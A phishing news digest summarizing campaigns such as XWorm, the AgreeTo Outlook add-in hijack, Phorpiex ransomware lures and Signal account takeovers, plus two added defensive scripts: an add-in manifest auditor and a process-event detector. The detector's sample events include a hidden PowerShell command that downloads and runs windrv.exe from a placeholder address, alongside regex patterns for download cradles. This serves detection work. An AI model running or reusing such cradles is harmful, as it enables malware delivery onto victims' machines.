ciso brief

All news with #phishing tag

615 articles · page 12 of 31

Phishing Campaign Uses Old Office Flaw to Deploy XWorm

🔒 Fortinet researchers disclosed a phishing campaign that chains a legacy Microsoft Office Equation Editor vulnerability (CVE-2018-0802) with fileless execution to deliver the commercially available XWorm RAT. The attack begins with business-themed lures and a malicious Excel attachment, then pivots into HTA and PowerShell stages to keep most activity off disk. A memory-resident .NET stage fetches the XWorm payload and runs it inside a hollowed msbuild.exe process; XWorm then communicates with its C2 over AES-encrypted traffic and supports modular plugins that enable credential theft, data exfiltration, and other operator actions.

Microsoft Store Outlook Add-in Hijacked to Steal Accounts

🔒 The AgreeTo Outlook add-in was hijacked and turned into a full phishing kit that stole more than 4,000 Microsoft account credentials, researchers at Koi Security report. The module, listed on the Microsoft Office Add-in Store since December 2022, relied on an abandoned Vercel-hosted URL that an attacker claimed and used to serve a fake Microsoft sign-in page inside Outlook’s sidebar. Credentials, credit card details and banking security answers were exfiltrated via a Telegram bot API before victims were redirected to the real login page. Microsoft removed the add-in after the disclosure; users should uninstall AgreeTo and reset affected passwords.

Spam and Phishing Trends and Schemes Observed in 2025

🔒 Kaspersky's anti-phishing systems blocked more than 554 million phishing-link attempts in 2025, while Mail Anti-Virus intercepted nearly 145 million malicious attachments and almost 45% of all email traffic was identified as spam. Scammers refined tactics across ticketing and streaming fraud, messaging-app account takeovers, government impersonation, and KYC harvesting, often using AI-generated content and deepfakes. Messaging platforms such as Telegram and WhatsApp were heavily abused to hijack accounts via phishing and malicious Mini Apps. Users are advised to check URLs carefully, never share verification codes, enable two-factor authentication, and run robust protection like Kaspersky solutions.

Netherlands Police Arrest Seller of JokerOTP MFA Tool

🔒 The Netherlands Police arrested a 21-year-old man from Dordrecht accused of selling access to the JokerOTP phishing-as-a-service platform that captures one-time passwords to enable account takeover. Investigators say this is the third arrest after a three-year probe that dismantled the operation in April 2025 and previously identified a developer and a co-developer. The seller advertised license keys on Telegram, allowing subscribers to automate calls that tricked victims into revealing OTPs, PINs, and card data, leading to fraud and unauthorized transfers.

First Malicious Outlook Add-in Found in Supply-Chain Attack

🔍 Cybersecurity researchers at Koi Security disclosed the first known malicious Microsoft Outlook add-in, codenamed AgreeToSteal. The attacker claimed the abandoned hostname that the add-in's manifest pointed to (outlook-one.vercel[.]app) and used it to serve a fake Microsoft sign-in page, harvesting more than 4,000 credentials and exfiltrating them via the Telegram Bot API. The affected add-in, AgreeTo, a calendar/availability tool last updated in December 2022, had requested the ReadWriteItem permission, which would have allowed covert read and write access to the mail item a victim had open. Koi recommends domain verification, re-review triggers, delisting stale add-ins, and visible install counts to reduce similar supply-chain abuse.
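A manifest check that a tenant administrator or marketplace reviewer could run against an Office add-in, added here as an example; it is not Koi Security's or Microsoft's tooling. It lists every code location the manifest points to, reads the declared permission level, and flags hosts on platforms where a deleted project's subdomain can be re-registered by whoever asks next, which is the failure the AgreeTo case turned on. The manifest, the vendor hostnames and the list of re-claimable platforms are constructed assumptions.

```python
"""Audit an Office add-in manifest for the abandoned-host failure behind the AgreeTo case.

Added example; not Koi Security's or Microsoft's tooling. The manifest,
hostnames and the list of re-claimable platforms are constructed assumptions.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Manifest permission levels, lowest to highest (Office add-in schema values).
PERMISSION_RANK = {"Restricted": 0, "ReadItem": 1, "ReadWriteItem": 2, "ReadWriteMailbox": 3}

# Assumption: platforms that hand out subdomains first-come, first-served, so a
# deleted project's hostname can be claimed by anyone who registers it next.
RECLAIMABLE_SUFFIXES = (".vercel.app", ".netlify.app", ".github.io", ".herokuapp.com")

# Constructed minimal MailApp manifest; the vercel.app host is hypothetical.
SAMPLE_MANIFEST = """<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0"
  xsi:type="MailApp">
  <Id>00000000-0000-4000-8000-000000000000</Id>
  <Version>1.0.0.0</Version>
  <ProviderName>Example Vendor</ProviderName>
  <DefaultLocale>en-US</DefaultLocale>
  <DisplayName DefaultValue="Scheduling Helper"/>
  <Description DefaultValue="Constructed sample manifest"/>
  <Hosts><Host Name="Mailbox"/></Hosts>
  <Requirements><Sets><Set Name="Mailbox" MinVersion="1.1"/></Sets></Requirements>
  <FormSettings>
    <Form xsi:type="ItemRead">
      <DesktopSettings>
        <SourceLocation DefaultValue="https://scheduler-demo.vercel.app/taskpane.html"/>
        <RequestedHeight>250</RequestedHeight>
      </DesktopSettings>
    </Form>
  </FormSettings>
  <Permissions>ReadWriteItem</Permissions>
  <Rule xsi:type="ItemIs" ItemType="Message" FormType="Read"/>
  <VersionOverrides xmlns="http://schemas.microsoft.com/office/mailappversionoverrides"
    xsi:type="VersionOverridesV1_0">
    <Resources>
      <bt:Urls>
        <bt:Url id="Taskpane.Url" DefaultValue="https://scheduler-demo.vercel.app/taskpane.html"/>
        <bt:Url id="Commands.Url" DefaultValue="https://cdn.example-vendor.com/commands.html"/>
      </bt:Urls>
    </Resources>
  </VersionOverrides>
</OfficeApp>
"""


def extract_urls(manifest_xml):
    """Every http(s) URL declared in a DefaultValue attribute (SourceLocation,
    bt:Url, icons), regardless of which namespace the element lives in."""
    urls = []
    for el in ET.fromstring(manifest_xml).iter():
        val = el.attrib.get("DefaultValue", "")
        if val.startswith(("http://", "https://")) and val not in urls:
            urls.append(val)
    return urls


def declared_permission(manifest_xml):
    """Text of the <Permissions> element; a missing element means Restricted."""
    for el in ET.fromstring(manifest_xml).iter():
        if el.tag.rsplit("}", 1)[-1] == "Permissions":
            return (el.text or "").strip()
    return "Restricted"


def audit_manifest(manifest_xml, trusted_hosts):
    """Return human-readable findings; trusted_hosts are the vendor's own domains."""
    findings = []
    perm = declared_permission(manifest_xml)
    if PERMISSION_RANK.get(perm, 0) >= PERMISSION_RANK["ReadWriteItem"]:
        findings.append(f"permission {perm}: add-in can read and modify the open item")
    for url in extract_urls(manifest_xml):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if parsed.scheme != "https":
            findings.append(f"code loaded over plain HTTP: {url}")
        if host.endswith(RECLAIMABLE_SUFFIXES):
            findings.append(f"code served from a re-claimable platform host: {host}")
        elif host not in trusted_hosts and not any(host.endswith("." + t) for t in trusted_hosts):
            findings.append(f"code host not on the vendor allowlist: {host}")
    return findings


if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST, {"example-vendor.com"}):
        print(finding)
```

The URL walk is deliberately namespace-agnostic: `VersionOverrides` switches the default namespace mid-document, so a search pinned to the root schema would miss the `bt:Url` entries that an Outlook client actually loads. A hostname on a re-claimable platform is only a risk signal; the follow-up is to confirm the vendor still controls the project, which this offline check cannot do.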

Valentine’s Day 2026 Scams: Rising Phishing & Fraud

💌 Check Point researchers report a sharp rise in Valentine-themed phishing websites, fraudulent online stores, and fake dating platforms that aim to steal personal data and payment information from shoppers and daters ahead of Valentine’s Day 2026. From March–December 2025, new Valentine-related domains averaged 474 per month; registrations jumped to 696 in January 2026, a 44% increase. In the first five days of February researchers detected 152 additional domains, a further 36% rise in the daily average. The trend reflects opportunistic abuse of seasonal demand and last-minute gift shopping.

Spoofed PDF Deliveries Enable New AsyncRAT Campaign

📄 Malwarebytes warned of a phishing campaign that disguises malware as ordinary PDF files to increase the likelihood that employees will open them. Attackers host a virtual hard disk (VHD) file on IPFS; when a victim opens it, Windows mounts it as a local drive, and inside is a Windows Script File (.wsf) named to look like a PDF. Running that file executes AsyncRAT and gives the attackers remote access. Organizations should configure Windows to show file extensions and treat files fetched through IPFS gateways, and disk images in general, with caution.

Phorpiex Phishing Campaign Deploys Global Group Ransomware

📎 Forcepoint observed a high-volume phishing campaign using the subject "Your Document" that delivers weaponised Windows shortcut (.lnk) attachments to initiate a multi-stage Phorpiex infection. The .lnk files rely on Windows hiding known file extensions and on a copied Office document icon to turn a single click into silent execution: the shortcut launches cmd.exe, which invokes PowerShell to download and run a second-stage binary saved as windrv.exe. The retrieved payload is linked to the long-running Phorpiex MaaS botnet and, in these incidents, deployed Global Group ransomware that encrypts files and alters the desktop without contacting a C2 server.

Deep Dive: XWorm Phishing Campaign Exploits Excel Files

🔍 FortiGuard Labs observed a phishing campaign delivering a new XWorm RAT variant via malicious Excel attachments that exploit CVE-2018-0802 to execute embedded shellcode. The chain uses an obfuscated HTA and PowerShell to load a fileless .NET module, which downloads a PE in memory and uses process hollowing into Msbuild.exe to run XWorm. The RAT establishes AES-encrypted C2, supports extensive commands and plugins, and enables data theft, remote control, DDoS, and ransomware operations. Fortinet protections including FortiMail, AV, IPS, and Web Filtering are effective against observed indicators.

ZeroDayRAT Mobile Spyware Targets Android and iOS Users

📱 ZeroDayRAT is a newly documented cross-platform mobile spyware operation targeting Android and iOS, according to iVerify. The toolkit grants persistent access to messages, precise GPS history, notifications, camera, microphone and keystroke capture, and exposes a dedicated web dashboard for rapid device profiling. Infections are commonly initiated via smishing, counterfeit app stores, phishing emails and links shared through messaging apps.

Weaponized Windows Shortcuts Deliver Global Group Ransomware

📄 Forcepoint X‑Labs researchers have uncovered a Phorpiex‑backed phishing campaign that weaponizes Windows shortcut (.lnk) files to deploy Global Group ransomware. Attackers send messages with the subject "Your Document" and attachments such as "Document.doc.lnk", exploiting hidden file extensions and a Word‑style icon to trick recipients. The .lnk uses built‑in utilities (cmd.exe and PowerShell) and heavily obfuscated commands to fetch and run a second‑stage payload, leveraging living‑off‑the‑land techniques so the ransomware executes locally without external C2 communication.

Taxing times: Top IRS scams to watch for in 2026 season

🔍 Tax season 2026 brings a renewed surge in IRS-related scams as fraudsters exploit email, text and phone channels to steal refunds and personal data. Scammers impersonate the IRS, tax preparers or software vendors with spoofed logos, domains and caller IDs, and may demand unusual payment methods or coax victims into filing fraudulent returns. Watch for phishing/smishing/vishing, W-2 fraud, fake tax credits and dishonest preparers. Protect accounts with MFA, consider an IRS Identity Protection PIN (IP PIN), file early and report suspicious messages to phishing@irs.gov.

UNC1069 Targets Cryptocurrency with AI-Enabled Lures

🔒 Mandiant links a targeted intrusion to UNC1069 that leveraged AI-enabled social engineering to compromise a cryptocurrency executive and deploy multiple macOS malware families. The attacker used a hijacked Telegram account, a spoofed Zoom meeting allegedly featuring a deepfake video, and a ClickFix paste-and-execute ruse to trick the victim into running troubleshooting commands. The operation dropped WAVESHAPER, HYPERCALL, HIDDENCALL, SUGARLOADER, DEEPBREATH, CHROMEPUSH, and SILENCELIFT to harvest credentials, browser data, and session tokens. GTIG and Mandiant highlight UNC1069's expanding use of GenAI for lures and tooling.

Exchange Online flags legitimate emails as phishing

📧 Microsoft is investigating an ongoing Exchange Online issue that is mistakenly marking legitimate email messages as phishing and quarantining them. The problem began on February 5 and continues to disrupt customers' ability to send and receive mail. Microsoft traced the fault to a newly introduced URL rule that incorrectly classifies certain links as malicious. The company is releasing quarantined messages and working to unblock legitimate URLs while it completes remediation.

Authorities Warn of Signal Hijacks Targeting German Officials

🔐 German security agencies warn of an active campaign targeting high‑ranking politicians, soldiers, diplomats and journalists by seizing their Signal accounts. Attackers impersonate support teams to request the victim's Signal PIN or trick users into approving device linking via QR codes, then move the account to a number they control. No malware or software vulnerabilities are involved; the campaign relies on social engineering. Authorities note similar methods could be used against WhatsApp, and stress that official support will never request PINs via message.

Fake Dubai Crown Prince Traced to Nigerian Mansion

🔎 A detailed investigation by OCCRP traced a romance scammer who impersonated the Crown Prince of Dubai and defrauded a Romanian businesswoman of more than US $2.5 million. Over two years the con combined thousands of messages, staged in-person meetings, and an elaborate fake banking site showing a phantom £200 million balance. Photographs and bank-trace evidence led reporters and UK police to identify intermediaries and to locate the suspect at a mansion in Abuja, Nigeria. The case underscores the sophistication and international reach of modern romance and investment scams.

German Agencies Warn of Signal Phishing Targeting Elites

🔒 Germany's Federal Office for the Protection of the Constitution (BfV) and the Federal Office for Information Security (BSI) have issued a joint advisory about a likely state‑sponsored phishing campaign that abuses Signal's legitimate features to seize accounts. Threat actors impersonate "Signal Support" or a "Signal Security ChatBot" to solicit SMS PINs or trick victims into scanning QR codes, enabling account registration on attacker‑controlled devices or silent device linking. Authorities recommend enabling Registration Lock, avoiding sharing verification codes, and routinely reviewing linked devices; the same methods can be applied to WhatsApp.

Germany warns of Signal account hijacking targeting VIPs

⚠️ Germany's domestic intelligence agencies warn of suspected state-backed campaigns that hijack messaging accounts on Signal to target politicians, military officers, diplomats, and journalists. The attacks use social engineering rather than malware, abusing legitimate features such as QR-code pairing and SMS/PIN verification. Two variants are reported: a full account takeover and a silent device pairing that monitors chats and contacts. Authorities advise blocking/reporting support-like messages, enabling Registration Lock, and routinely checking linked devices.

Phishing campaign hides AsyncRAT in fake disk-mounted PDFs

🛡️ A recent phishing campaign delivers malicious virtual hard disks that masquerade as PDF invoices and purchase orders, enabling attackers to install AsyncRAT. The files are hosted on IPFS and mount as local drives on Windows, which sidesteps some built-in protections because files inside a mounted image typically do not carry the Mark of the Web that a directly downloaded file would; inside each disk is a Windows Script File disguised as the expected PDF. Malwarebytes Labs, citing Securonix, identified the Dead#Vax campaign and recommends showing file extensions and exercising caution with disk images.
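Detection logic for the patterns that recur in the Phorpiex (.doc.lnk to cmd.exe to PowerShell to windrv.exe), XWorm (PowerShell hollowing a payload into MSBuild.exe) and AsyncRAT (.pdf.wsf inside a mounted disk image) entries above, added here as an example and not any of those vendors' detection content. It classifies attachment names that hide an executable extension behind a document one, and runs four rules over Sysmon-style process-creation records. The events, paths, user name and the 203.0.113.10 address are constructed; only windrv.exe and MSBuild.exe are taken from the entries.

```python
"""Detect the lure-and-LOLBin chains from the Phorpiex, XWorm and AsyncRAT entries.

Added example; not Forcepoint's, Fortinet's or Malwarebytes' detection content.
Events are constructed Sysmon-style process-creation records; paths, user names
and the 203.0.113.10 address are assumptions.
"""
import re
from dataclasses import dataclass

# Extensions that execute on double-click and are routinely hidden behind a
# document-looking name ("Document.doc.lnk", "Invoice.pdf.wsf").
EXECUTABLE_EXTS = {"lnk", "wsf", "js", "jse", "vbs", "vbe", "hta", "scr", "exe", "pif", "cmd", "bat"}
DOCUMENT_EXTS = {"doc", "docx", "pdf", "xls", "xlsx", "txt", "jpg", "png"}
# Disk images Windows mounts natively; mail gateways often do not look inside them.
CONTAINER_EXTS = {"vhd", "vhdx", "iso", "img"}


def classify_attachment(name):
    """Return a reason string if the file name has a known lure shape, else None."""
    parts = name.lower().split(".")
    if len(parts) < 2:
        return None
    final = parts[-1]
    inner = parts[-2] if len(parts) >= 3 else ""
    if final in EXECUTABLE_EXTS and inner in DOCUMENT_EXTS:
        return f"document look-alike with executable extension .{final}"
    if final in EXECUTABLE_EXTS:
        return f"executable attachment type .{final}"
    if final in CONTAINER_EXTS:
        return f"mountable disk image .{final}; unpack and scan the contents"
    return None


@dataclass
class ProcEvent:
    image: str          # path of the new process
    parent_image: str   # path of the process that created it
    command_line: str


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|bitsadmin|invoke-expression|\biex\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b", re.I)
PROJECT_ARG = re.compile(r"\.(proj|csproj|vbproj|sln|targets)\b", re.I)
SCRIPT_ARG = re.compile(r"[\w:\\./-]+\.(wsf|js|jse|vbs|vbe|hta)\b", re.I)


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return (rule, image) pairs for events that match one of four rules."""
    hits = []
    for ev in events:
        img, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
        # 1. Shortcut double-click: explorer.exe spawns a shell that pulls a payload.
        if parent == "explorer.exe" and img in SHELLS and CRADLE.search(cmd):
            hits.append(("explorer-to-shell-cradle", img))
        # 2. Hidden PowerShell carrying a download cradle, whatever the parent.
        elif img in {"powershell.exe", "pwsh.exe"} and HIDDEN.search(cmd) and CRADLE.search(cmd):
            hits.append(("hidden-powershell-cradle", img))
        # 3. Script host running a document look-alike (the .pdf.wsf case).
        if img in SCRIPT_HOSTS:
            match = SCRIPT_ARG.search(cmd)
            reason = classify_attachment(basename(match.group(0))) if match else None
            if reason and reason.startswith("document look-alike"):
                hits.append(("script-host-lookalike", img))
        # 4. MSBuild started by a shell with no project file: a hollowing host, not a build.
        if img == "msbuild.exe" and parent in SHELLS and not PROJECT_ARG.search(cmd):
            hits.append(("msbuild-no-project", img))
    return hits


# Constructed events: the two malicious chains plus two benign controls.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              r'cmd.exe /c powershell -w hidden -c "iwr http://203.0.113.10/windrv.exe -OutFile $env:TEMP\windrv.exe; start $env:TEMP\windrv.exe"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\cmd.exe",
              r'powershell -w hidden -c "iwr http://203.0.113.10/windrv.exe -OutFile $env:TEMP\windrv.exe; start $env:TEMP\windrv.exe"'),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
              r'"C:\Windows\System32\wscript.exe" "E:\PO_2026-0217.pdf.wsf"'),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", r"C:\Windows\explorer.exe",
              r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Report.docx"'),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              r'MSBuild.exe /t:Build "C:\src\app.csproj"'),
]


if __name__ == "__main__":
    for name in ("Document.doc.lnk", "PO_2026-0217.pdf.wsf", "Invoice_4471.vhd", "report.pdf"):
        print(f"{name}: {classify_attachment(name)}")
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

Rule 4 is the one worth tuning on a real estate: build servers and Visual Studio launch MSBuild constantly, which is why it keys on a script-host parent and the absence of a project argument rather than on the binary alone. Rule 1 fires on the cmd.exe stage even though the cradle only runs in the child PowerShell, because the shortcut passes the whole command line through cmd.exe, which is exactly what the "Your Document" lure does.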

Man Pleads Guilty to Hacking Nearly 600 Snapchat Accounts

🔒 Kyle Svara, 26, pleaded guilty in federal court to phishing access codes and hacking nearly 600 Snapchat accounts to steal nude photos that he kept, sold, or traded. Between May 2020 and February 2021 he used social engineering to harvest credentials from roughly 570 victims and accessed at least 59 accounts to download private images. Svara advertised hacking services online, communicated via Kik, and accepted paid jobs including work for former Northeastern coach Steve Waithe. He now faces multiple federal charges, and is scheduled for sentencing on May 18.